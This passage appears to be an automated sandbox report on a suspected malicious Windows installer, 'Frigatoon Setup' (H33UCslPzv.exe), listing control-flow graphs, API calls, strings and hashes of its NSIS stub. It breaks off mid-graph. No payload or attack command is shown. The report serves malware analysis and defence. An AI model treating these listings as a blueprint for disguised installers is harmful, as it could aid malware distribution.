5630->5631 5632 402138 5633 402b2c 17 API calls 5632->5633 5634 40213f 5633->5634 5635 402b2c 17 API calls 5634->5635 5636 402149 5635->5636 5637 402b2c 17 API calls 5636->5637 5638 402153 5637->5638 5639 402b2c 17 API calls 5638->5639 5640 40215d 5639->5640 5641 402b2c 17 API calls 5640->5641 5642 402167 5641->5642 5643 4021a9 CoCreateInstance 5642->5643 5644 402b2c 17 API calls 5642->5644 5647 4021c8 5643->5647 5649 402273 5643->5649 5644->5643 5645 401423 24 API calls 5646 4022a9 5645->5646 5648 402253 MultiByteToWideChar 5647->5648 5647->5649 5648->5649 5649->5645 5649->5646 4992 4015bb 4993 402b2c 17 API calls 4992->4993 4994 4015c2 4993->4994 4995 405a1e 4 API calls 4994->4995 5007 4015ca 4995->5007 4996 401624 4998 401652 4996->4998 4999 401629 4996->4999 4997 4059b0 CharNextA 4997->5007 5001 401423 24 API calls 4998->5001 5000 401423 24 API calls 4999->5000 5002 401630 5000->5002 5009 40164a 5001->5009 5011 405fed lstrcpynA 5002->5011 5004 405657 2 API calls 5004->5007 5005 405674 5 API calls 5005->5007 5006 40163b SetCurrentDirectoryA 5006->5009 5007->4996 5007->4997 5007->5004 5007->5005 5008 40160c GetFileAttributesA 5007->5008 5010 4055da 4 API calls 5007->5010 5008->5007 5010->5007 5011->5006 5650 4016bb 5651 402b2c 17 API calls 5650->5651 5652 4016c1 GetFullPathNameA 5651->5652 5653 4016d8 5652->5653 5659 4016f9 5652->5659 5656 4062f0 2 API calls 5653->5656 5653->5659 5654 4029b8 5655 40170d GetShortPathNameA 5655->5654 5657 4016e9 5656->5657 5657->5659 5660 405fed lstrcpynA 5657->5660 5659->5654 5659->5655 5660->5659 5661 40273b 5662 402741 5661->5662 5663 402745 FindNextFileA 5662->5663 5665 402757 5662->5665 5664 402796 5663->5664 5663->5665 5667 405fed lstrcpynA 5664->5667 5667->5665 5668 40243d 5669 402b2c 17 API calls 5668->5669 5670 40244f 5669->5670 5671 402b2c 17 API calls 5670->5671 5672 402459 5671->5672 5685 402bbc 5672->5685 5675 4029b8 5676 40248e 5678 40249a 5676->5678 5679 402b0a 17 API calls 5676->5679 5677 402b2c 17 API calls 5681 402487 lstrlenA 5677->5681 5680 4024b9 RegSetValueExA 5678->5680 5682 402ffb 31 API calls 5678->5682 5679->5678 5683 4024cf RegCloseKey 5680->5683 5681->5676 5682->5680 5683->5675 5686 402bd7 5685->5686 5689 405ea1 5686->5689 5690 405eb0 5689->5690 5691 402469 5690->5691 5692 405ebb RegCreateKeyExA 5690->5692 5691->5675 5691->5676 5691->5677 5692->5691 5693 401b3f 5694 402b2c 17 API calls 5693->5694 5695 401b46 5694->5695 5696 402b0a 17 API calls 5695->5696 5697 401b4f wsprintfA 5696->5697 5698 4029b8 5697->5698

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 403248-403287 SetErrorMode GetVersion 1 403289-403291 call 406385 0->1 2 40329a 0->2 1->2 8 403293 1->8 4 40329f-4032b2 call 406317 lstrlenA 2->4 9 4032b4-4032d0 call 406385 * 3 4->9 8->2 16 4032e1-40333f #17 OleInitialize SHGetFileInfoA call 405fed GetCommandLineA call 405fed 9->16 17 4032d2-4032d8 9->17 24 403341-403346 16->24 25 40334b-403360 call 4059b0 CharNextA 16->25 17->16 21 4032da 17->21 21->16 24->25 28 403425-403429 25->28 29 403365-403368 28->29 30 40342f 28->30 31 403370-403378 29->31 32 40336a-40336e 29->32 33 403442-40345c GetTempPathA call 403217 30->33 34 403380-403383 31->34 35 40337a-40337b 31->35 32->31 32->32 43 4034b4-4034ce DeleteFileA call 402dc4 33->43 44 40345e-40347c GetWindowsDirectoryA lstrcatA call 403217 33->44 37 403415-403422 call 4059b0 34->37 38 403389-40338d 34->38 35->34 37->28 56 403424 37->56 41 4033a5-4033d2 38->41 42 40338f-403395 38->42 49 4033d4-4033da 41->49 50 4033e5-403413 41->50 47 403397-403399 42->47 48 40339b 42->48 59 403562-403572 call 403730 OleUninitialize 43->59 60 4034d4-4034da 43->60 44->43 58 40347e-4034ae GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 403217 44->58 47->41 47->48 48->41 52 4033e0 49->52 53 4033dc-4033de 49->53 50->37 55 403431-40343d call 405fed 50->55 52->50 53->50 53->52 55->33 56->28 58->43 58->59 72 403696-40369c 59->72 73 403578-403588 call 405709 ExitProcess 59->73 63 403552-403559 call 40380a 60->63 64 4034dc-4034e7 call 4059b0 60->64 70 40355e 63->70 76 4034e9-403512 64->76 77 40351d-403527 64->77 70->59 74 403718-403720 72->74 75 40369e-4036b7 GetCurrentProcess OpenProcessToken 72->75 82 403722 74->82 83 403726-40372a ExitProcess 74->83 79 4036e9-4036f7 call 406385 75->79 80 4036b9-4036e3 LookupPrivilegeValueA AdjustTokenPrivileges 75->80 81 403514-403516 76->81 84 403529-403536 call 405a73 77->84 85 40358e-4035a2 call 405674 lstrcatA 77->85 97 403705-40370f ExitWindowsEx 79->97 98 4036f9-403703 79->98 80->79 81->77 90 403518-40351b 81->90 82->83 84->59 94 403538-40354e call 405fed * 2 84->94 95 4035a4-4035aa lstrcatA 85->95 96 4035af-4035c9 lstrcatA lstrcmpiA 85->96 90->77 90->81 94->63 95->96 96->59 100 4035cb-4035ce 96->100 97->74 101 403711-403713 call 40140b 97->101 98->97 98->101 103 4035d0-4035d5 call 4055da 100->103 104 4035d7 call 405657 100->104 101->74 112 4035dc-4035e9 SetCurrentDirectoryA 103->112 104->112 113 4035f6-40361e call 405fed 112->113 114 4035eb-4035f1 call 405fed 112->114 118 403624-403640 call 40600f DeleteFileA 113->118 114->113 121 403681-403688 118->121 122 403642-403652 CopyFileA 118->122 121->118 124 40368a-403691 call 405dcc 121->124 122->121 123 403654-403674 call 405dcc call 40600f call 40568c 122->123 123->121 133 403676-40367d CloseHandle 123->133 124->59 133->121
                                                                  APIs
                                                                  • SetErrorMode.KERNELBASE ref: 0040326D
                                                                  • GetVersion.KERNEL32 ref: 00403273
                                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004032A6
                                                                  • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004032E2
                                                                  • OleInitialize.OLE32(00000000), ref: 004032E9
                                                                  • SHGetFileInfoA.SHELL32(0079E508,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 00403305
                                                                  • GetCommandLineA.KERNEL32(Frigatoon Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 0040331A
                                                                  • CharNextA.USER32(00000000,"C:\Users\user\Desktop\H33UCslPzv.exe",00000020,"C:\Users\user\Desktop\H33UCslPzv.exe",00000000,?,00000006,00000008,0000000A), ref: 00403356
                                                                  • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 00403453
                                                                  • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 00403464
                                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403470
                                                                  • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403484
                                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040348C
                                                                  • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040349D
                                                                  • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004034A5
                                                                  • DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 004034B9
                                                                    • Part of subcall function 00406385: GetModuleHandleA.KERNEL32(?,?,?,004032BB,0000000A), ref: 00406397
                                                                    • Part of subcall function 00406385: GetProcAddress.KERNEL32(00000000,?), ref: 004063B2
                                                                    • Part of subcall function 0040380A: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\unscorified,1033,0079F548,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F548,00000000,00000002,76F93410), ref: 004038FA
                                                                    • Part of subcall function 0040380A: lstrcmpiA.KERNEL32(?,.exe), ref: 0040390D
                                                                    • Part of subcall function 0040380A: GetFileAttributesA.KERNEL32(Call), ref: 00403918
                                                                    • Part of subcall function 0040380A: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\unscorified), ref: 00403961
                                                                    • Part of subcall function 0040380A: RegisterClassA.USER32(007A26E0), ref: 0040399E
                                                                    • Part of subcall function 00403730: CloseHandle.KERNEL32(000002E4,00403567,?,?,00000006,00000008,0000000A), ref: 0040373B
                                                                  • OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 00403567
                                                                  • ExitProcess.KERNEL32 ref: 00403588
                                                                  • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 004036A5
                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 004036AC
                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004036C4
                                                                  • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004036E3
                                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403707
                                                                  • ExitProcess.KERNEL32 ref: 0040372A
                                                                    • Part of subcall function 00405709: MessageBoxIndirectA.USER32(0040A218), ref: 00405764
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                                  • String ID: "$"C:\Users\user\Desktop\H33UCslPzv.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\unscorified$C:\Users\user\AppData\Local\Temp\unscorified\Pacinian$C:\Users\user\Desktop$C:\Users\user\Desktop\H33UCslPzv.exe$Error launching installer$Frigatoon Setup$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                  • API String ID: 3776617018-2147290433
                                                                  • Opcode ID: 838075baaf5ca056da215ee939d52fd3958900b4641c77022dcb02f612f56dab
                                                                  • Instruction ID: 4b1384cee9ffc8e7d3909f75f513e580ba658b4e0f6039b9d7a5280b54d142a8
                                                                  • Opcode Fuzzy Hash: 838075baaf5ca056da215ee939d52fd3958900b4641c77022dcb02f612f56dab
                                                                  • Instruction Fuzzy Hash: B3C1E870104741AAD7216F759D89A2F3FA8AB86306F05453FF581B61E2CB7C8A15CB2E

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 134 405252-40526e 135 405274-40533b GetDlgItem * 3 call 4040b0 call 4049a1 GetClientRect GetSystemMetrics SendMessageA * 2 134->135 136 4053fd-405403 134->136 159 405359-40535c 135->159 160 40533d-405357 SendMessageA * 2 135->160 138 405405-405427 GetDlgItem CreateThread CloseHandle 136->138 139 40542d-405439 136->139 138->139 141 40545b-405461 139->141 142 40543b-405441 139->142 145 405463-405469 141->145 146 4054b6-4054b9 141->146 143 405443-405456 ShowWindow * 2 call 4040b0 142->143 144 40547c-405483 call 4040e2 142->144 143->141 156 405488-40548c 144->156 149 40546b-405477 call 404054 145->149 150 40548f-40549f ShowWindow 145->150 146->144 153 4054bb-4054c1 146->153 149->144 157 4054a1-4054aa call 405114 150->157 158 4054af-4054b1 call 404054 150->158 153->144 154 4054c3-4054d6 SendMessageA 153->154 161 4055d3-4055d5 154->161 162 4054dc-405508 CreatePopupMenu call 40600f AppendMenuA 154->162 157->158 158->146 163 40536c-405383 call 40407b 159->163 164 40535e-40536a SendMessageA 159->164 160->159 161->156 171 40550a-40551a GetWindowRect 162->171 172 40551d-405533 TrackPopupMenu 162->172 173 405385-405399 ShowWindow 163->173 174 4053b9-4053da GetDlgItem SendMessageA 163->174 164->163 171->172 172->161 175 405539-405553 172->175 176 4053a8 173->176 177 40539b-4053a6 ShowWindow 173->177 174->161 178 4053e0-4053f8 SendMessageA * 2 174->178 179 405558-405573 SendMessageA 175->179 180 4053ae-4053b4 call 4040b0 176->180 177->180 178->161 179->179 181 405575-405595 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 179->181 180->174 183 405597-4055b7 SendMessageA 181->183 183->183 184 4055b9-4055cd GlobalUnlock SetClipboardData CloseClipboard 183->184 184->161
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,00000403), ref: 004052B1
                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004052C0
                                                                  • GetClientRect.USER32(?,?), ref: 004052FD
                                                                  • GetSystemMetrics.USER32(00000002), ref: 00405304
                                                                  • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405325
                                                                  • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405336
                                                                  • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405349
                                                                  • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405357
                                                                  • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040536A
                                                                  • ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040538C
                                                                  • ShowWindow.USER32(?,00000008), ref: 004053A0
                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004053C1
                                                                  • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004053D1
                                                                  • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004053EA
                                                                  • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004053F6
                                                                  • GetDlgItem.USER32(?,000003F8), ref: 004052CF
                                                                    • Part of subcall function 004040B0: SendMessageA.USER32(00000028,?,00000001,00403EE0), ref: 004040BE
                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405412
                                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_000051E6,00000000), ref: 00405420
                                                                  • CloseHandle.KERNELBASE(00000000), ref: 00405427
                                                                  • ShowWindow.USER32(00000000), ref: 0040544A
                                                                  • ShowWindow.USER32(?,00000008), ref: 00405451
                                                                  • ShowWindow.USER32(00000008), ref: 00405497
                                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004054CB
                                                                  • CreatePopupMenu.USER32 ref: 004054DC
                                                                  • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004054F1
                                                                  • GetWindowRect.USER32(?,000000FF), ref: 00405511
                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040552A
                                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405566
                                                                  • OpenClipboard.USER32(00000000), ref: 00405576
                                                                  • EmptyClipboard.USER32 ref: 0040557C
                                                                  • GlobalAlloc.KERNEL32(00000042,?), ref: 00405585
                                                                  • GlobalLock.KERNEL32(00000000), ref: 0040558F
                                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004055A3
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004055BC
                                                                  • SetClipboardData.USER32(00000001,00000000), ref: 004055C7
                                                                  • CloseClipboard.USER32 ref: 004055CD
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                  • String ID:
                                                                  • API String ID: 590372296-0
                                                                  • Opcode ID: fe83000176ef68774a1613465f0c1fa99a691d0f6c525a9b60e7a3ca6ad1dfb2
                                                                  • Instruction ID: e249d6b51738ec221da1a53d9ec42c2df55930041f70e6241115b0d1b6ef0d10
                                                                  • Opcode Fuzzy Hash: fe83000176ef68774a1613465f0c1fa99a691d0f6c525a9b60e7a3ca6ad1dfb2
                                                                  • Instruction Fuzzy Hash: D0A15AB1900608BFDF119F64DD85EAF7BB9FB48344F10802AFA41B61A1CB794E519F68

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 493 4057b5-4057db call 405a73 496 4057f4-4057fb 493->496 497 4057dd-4057ef DeleteFileA 493->497 499 4057fd-4057ff 496->499 500 40580e-40581e call 405fed 496->500 498 40597e-405982 497->498 501 405805-405808 499->501 502 40592c-405931 499->502 508 405820-40582b lstrcatA 500->508 509 40582d-40582e call 4059cc 500->509 501->500 501->502 502->498 504 405933-405936 502->504 506 405940-405948 call 4062f0 504->506 507 405938-40593e 504->507 506->498 517 40594a-40595e call 405985 call 40576d 506->517 507->498 511 405833-405836 508->511 509->511 514 405841-405847 lstrcatA 511->514 515 405838-40583f 511->515 516 40584c-40586a lstrlenA FindFirstFileA 514->516 515->514 515->516 518 405870-405887 call 4059b0 516->518 519 405922-405926 516->519 532 405960-405963 517->532 533 405976-405979 call 405114 517->533 526 405892-405895 518->526 527 405889-40588d 518->527 519->502 521 405928 519->521 521->502 530 405897-40589c 526->530 531 4058a8-4058b6 call 405fed 526->531 527->526 529 40588f 527->529 529->526 535 405901-405913 FindNextFileA 530->535 536 40589e-4058a0 530->536 544 4058b8-4058c0 531->544 545 4058cd-4058d8 call 40576d 531->545 532->507 538 405965-405974 call 405114 call 405dcc 532->538 533->498 535->518 541 405919-40591c FindClose 535->541 536->531 539 4058a2-4058a6 536->539 538->498 539->531 539->535 541->519 544->535 548 4058c2-4058cb call 4057b5 544->548 553 4058f9-4058fc call 405114 545->553 554 4058da-4058dd 545->554 548->535 553->535 555 4058f1-4058f7 554->555 556 4058df-4058ef call 405114 call 405dcc 554->556 555->535 556->535
                                                                  APIs
                                                                  • DeleteFileA.KERNELBASE(?,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057DE
                                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,\*.*,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,?,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405826
                                                                  • lstrcatA.KERNEL32(?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,?,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405847
                                                                  • lstrlenA.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,?,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040584D
                                                                  • FindFirstFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,?,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040585E
                                                                  • FindNextFileA.KERNELBASE(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 0040590B
                                                                  • FindClose.KERNELBASE(00000000), ref: 0040591C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                  • String ID: "C:\Users\user\Desktop\H33UCslPzv.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsj6A14.tmp$\*.*
                                                                  • API String ID: 2035342205-2393089348
                                                                  • Opcode ID: 8fda1b6a8b55d101ad800504929e014ab0da255cf75589647b7755d6ebd2940b
                                                                  • Instruction ID: eea8dcc9899e8fe382e67b4d85d328ba4a3fbbae0ab86688a1659871ceec6938
                                                                  • Opcode Fuzzy Hash: 8fda1b6a8b55d101ad800504929e014ab0da255cf75589647b7755d6ebd2940b
                                                                  • Instruction Fuzzy Hash: 4051E171800A08FADF226B618C45FAF7A78DF42728F14807BF841B51D2D73C4992DE69
                                                                  APIs
                                                                  • FindFirstFileA.KERNELBASE(76F93410,007A0D98,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,00405AB6,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,76F93410,?,C:\Users\user\AppData\Local\Temp\,004057D5,?,76F93410,C:\Users\user\AppData\Local\Temp\), ref: 004062FB
                                                                  • FindClose.KERNELBASE(00000000), ref: 00406307
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\nsj6A14.tmp, xrefs: 004062F0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: Find$CloseFileFirst
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsj6A14.tmp
                                                                  • API String ID: 2295610775-1184143763
                                                                  • Opcode ID: 6492e11af6876ec85f54452a190d9404ba6d94e49271ee4e7d15c167f534e484
                                                                  • Instruction ID: 3919553d01c23f7351ed85dbc682ed8077fcf54d37e588a2b2de2e61cdf0a9ad
                                                                  • Opcode Fuzzy Hash: 6492e11af6876ec85f54452a190d9404ba6d94e49271ee4e7d15c167f534e484
                                                                  • Instruction Fuzzy Hash: 14D012325451205BC75017786E0C88B7A589F963717214B36F9AAF61E0CB748C238AD8

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 185 403ba7-403bb9 186 403cfa-403d09 185->186 187 403bbf-403bc5 185->187 189 403d58-403d6d 186->189 190 403d0b-403d53 GetDlgItem * 2 call 40407b SetClassLongA call 40140b 186->190 187->186 188 403bcb-403bd4 187->188 193 403bd6-403be3 SetWindowPos 188->193 194 403be9-403bec 188->194 191 403dad-403db2 call 4040c7 189->191 192 403d6f-403d72 189->192 190->189 204 403db7-403dd2 191->204 196 403d74-403d7f call 401389 192->196 197 403da5-403da7 192->197 193->194 199 403c06-403c0c 194->199 200 403bee-403c00 ShowWindow 194->200 196->197 218 403d81-403da0 SendMessageA 196->218 197->191 203 404048 197->203 205 403c28-403c2b 199->205 206 403c0e-403c23 DestroyWindow 199->206 200->199 208 40404a-404051 203->208 214 403dd4-403dd6 call 40140b 204->214 215 403ddb-403de1 204->215 211 403c2d-403c39 SetWindowLongA 205->211 212 403c3e-403c44 205->212 209 404025-40402b 206->209 209->203 220 40402d-404033 209->220 211->208 216 403ce7-403cf5 call 4040e2 212->216 217 403c4a-403c5b GetDlgItem 212->217 214->215 221 404006-40401f DestroyWindow EndDialog 215->221 222 403de7-403df2 215->222 216->208 223 403c7a-403c7d 217->223 224 403c5d-403c74 SendMessageA IsWindowEnabled 217->224 218->208 220->203 226 404035-40403e ShowWindow 220->226 221->209 222->221 227 403df8-403e45 call 40600f call 40407b * 3 GetDlgItem 222->227 229 403c82-403c85 223->229 230 403c7f-403c80 223->230 224->203 224->223 226->203 255 403e47-403e4c 227->255 256 403e4f-403e8b ShowWindow KiUserCallbackDispatcher call 40409d EnableWindow 227->256 234 403c93-403c98 229->234 235 403c87-403c8d 229->235 233 403cb0-403cb5 call 404054 230->233 233->216 238 403cce-403ce1 SendMessageA 234->238 240 